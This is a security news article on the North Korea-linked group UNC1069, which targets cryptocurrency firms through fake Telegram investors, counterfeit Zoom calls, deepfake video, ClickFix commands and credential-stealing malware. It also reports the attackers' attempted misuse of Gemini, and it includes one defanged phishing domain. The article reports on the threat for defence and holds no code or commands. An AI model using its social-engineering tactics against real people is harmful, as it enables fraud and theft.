The North Korea-associated threat group UNC1069 has intensified its cyber operations against the cryptocurrency sector, leveraging advanced social engineering and artificial intelligence techniques to compromise Windows and macOS systems. The campaign is primarily designed to extract sensitive credentials and enable large-scale financial theft.
According to findings from Google Mandiant researchers Ross Inman and Adrian Hernandez, the operation combined a compromised Telegram account, a fraudulent Zoom meeting setup, a ClickFix infection method, and AI-generated video content to deceive victims.
A Long-Running Financially Motivated Campaign
Active since at least April 2018, UNC1069 has built a reputation for conducting financially motivated cyberattacks through carefully crafted social engineering campaigns. The group frequently impersonates venture capital investors and representatives of well-known firms on Telegram. Within the cybersecurity community, it is also identified as CryptoCore and MASAN.
In a previous report published in November, Google Threat Intelligence Group, GTIG, revealed that the group had incorporated generative AI tools such as Gemini to produce persuasive cryptocurrency-related lure material. There were also attempts to misuse Gemini for cryptocurrency theft code development. The campaign additionally involved deepfake images and videos imitating legitimate industry professionals to distribute a backdoor named BIGMACHO, disguised as a Zoom software development kit.
Since 2023, the group has shifted focus from traditional financial institutions to the Web3 ecosystem, targeting centralized exchanges, financial software developers, technology firms, and venture capital organizations.
Social Engineering Through Fake Zoom Meetings
The attack begins when victims are approached on Telegram by individuals posing as venture capitalists. In some cases, attackers exploit compromised Telegram accounts belonging to legitimate entrepreneurs or startup founders to enhance credibility.
After initial contact, a meeting is scheduled through Calendly, typically lasting 30 minutes. The provided meeting link redirects victims to a fraudulent Zoom-themed website, such as “zoom.uswe05[.]us.” Sometimes, phishing URLs are concealed using Telegram’s hyperlink feature.
Once the link is clicked, victims are shown a counterfeit Zoom interface prompting them to activate their camera and enter their name. Upon joining, the interface mimics a live Zoom meeting. Investigators suspect that the video content displayed may either be deepfake material or previously recorded webcam footage of earlier victims.
Kaspersky has tracked this activity under the name GhostCall, documenting how attackers secretly recorded webcam sessions and reused them to create the illusion of legitimate live calls. When the pre-recorded footage ends, the interface transitions smoothly to a static profile image, maintaining the deception.
ClickFix Infection Chain and Malware Deployment
Following the staged meeting, victims receive a fabricated audio error message and are instructed to execute a troubleshooting command using a ClickFix-style technique.
On macOS systems, these commands trigger an AppleScript that installs a malicious Mach-O binary known as WAVESHAPER. This C++ executable gathers system intelligence and deploys a Go-based downloader called HYPERCALL, which retrieves additional malicious payloads.
The attack chain includes multiple malware families:
- HIDDENCALL, a Golang backdoor that provides remote keyboard access and deploys a Swift-based data miner named DEEPBREATH.
- SUGARLOADER, a secondary C++ downloader responsible for deploying CHROMEPUSH.
- SILENCELIFT, a lightweight C or C++ backdoor that transmits system data to a command-and-control server.
- DEEPBREATH, designed to manipulate macOS Transparency, Consent, and Control settings, enabling unauthorized access to files and credential stores.
- CHROMEPUSH, a C++ browser extension disguised as an offline Google Docs editor, capable of stealing browser cookies, logging keystrokes, and extracting login credentials.
DEEPBREATH specifically targets iCloud Keychain credentials, browser data from Google Chrome, Brave, and Microsoft Edge, as well as Telegram and Apple Notes data.
Expanding Technical Capabilities
Security analysts note that deploying as many as seven distinct malware families on a single compromised host demonstrates a strong intent to harvest credentials, browser session tokens, and financial data. This multi-layered malware strategy significantly enhances UNC1069’s operational reach.
While the group historically focused on cryptocurrency startups and venture capital firms, the introduction of new malware variants such as SILENCELIFT and DEEPBREATH indicates a notable evolution in capability and persistence.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
